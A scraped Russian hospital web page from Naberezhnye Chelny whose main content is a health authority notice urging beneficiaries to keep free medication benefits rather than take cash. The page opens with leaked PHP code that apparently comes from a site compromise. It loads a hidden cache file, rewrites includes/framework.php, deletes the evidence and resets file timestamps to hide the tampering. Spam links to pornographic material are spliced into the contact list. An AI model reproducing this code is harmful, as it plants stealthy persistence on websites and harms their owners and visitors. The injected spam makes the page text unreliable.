$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } О предоставлении набора социальных услуг

Последние новости

О предоставлении набора социальных услуг

PDF Печать E-mail

 О предоставлении  набора  социальных услуг в части лекарственного обеспечения

 

Год от года растет количество пациентов, отказавшихся от бесплатного лекарственного обеспечения по городу Набережные Челны, в программе остаются лица, нуждающихся в дорогостоящих лекарственных препаратах.

По данным аналитических агентств фармацевтической отрасли рост числа льготников, которые предпочитают деньги бесплатным лекарствам, не позволяет достигнуть благих целей, которые государство планировало – увеличение продолжительности жизни, снижение уровня инвалидизации.

За год многое меняется в нашей жизни. К сожалению, у некоторых людей происходит ухудшение здоровья, им могут потребоваться дорогостоящие лекарственные препараты. В отчаянии граждане обращаются в различные инстанции с просьбами вернуть социальный пакет.

В связи с возможностью возобновления права на льготу только с начала следующего года граждане остаются в трудной жизненной ситуации, не имея возможности самостоятельно приобрести необходимые лекарства. В данной ситуации для сохранения своего здоровья они обращаются за помощью к родственникам, знакомым, вынуждены брать кредиты.

Конечно же, медицинские организации пролечат пациента в стационарных условиях, но это один-два курса в год в рамках установленного стандарта. Но амбулаторное лечение требует постоянного применения лекарственных препаратов при хронических заболеваниях. К сожалению, другие источники финансовой поддержки лекарственного обеспечения не предусмотрены и государство не имеет возможности оказать больному дополнительную лекарственную помощь.

Поэтому во избежание возможных последствий по ухудшению состояния здоровья в случае отказа от бесплатной лекарственной помощи, прежде чем принять решение, просим Вас вспомнить о персональной  ответственности каждого гражданина за поддержание собственного здоровья.

Также обращаем внимание граждан на положительные моменты при участии пациентов в льготной программе:

- выписка льготных рецептов на лекарственные препараты не ограничивается определенной суммой, что дает возможность получать эффективные дорогостоящие препараты;

- обеспечение лекарствами как по основному заболеванию, так и сопутствующим, включая симптоматическое лечение;

- низкий уровень цен на льготные лекарственные препараты. При отказе от набора социальных услуг больной вынужден будет покупать лекарственные препараты за собственные средства, с учетом оптовой и розничной надбавок.

Надеемся, что граждане нашего города примут правильное решение и выберут натуральные льготы в виде лекарственных средств.

 

Управление здравоохранения по г. Набережные Челны МЗ РТ

 

Наши контакты

423812, РТ, г. Набережные Челны,Московский пр-кт, д.85
Телефоны:

Гл.врач - 58-53-55

Приемная celebrity sextapes
hentai sex
celebrity porn
cartoon porn
milfporn
celebrity porn fakes
Amateur Porn
naked celebrities
naked celebrities
гл. врача
- 58-54-78

Справочная - 58-54-94

Приемное отделение - 58-52-02

Отделение платных услуг - 58-50-36

Горячая линия - 58-54-78

Группа VK  vk.com/infbol_nch

Факс: 58-54-78

E-mail:  infbol@mail.ru   mz.nchelny_ib@tatar.ru

  • Баннер
  • Баннер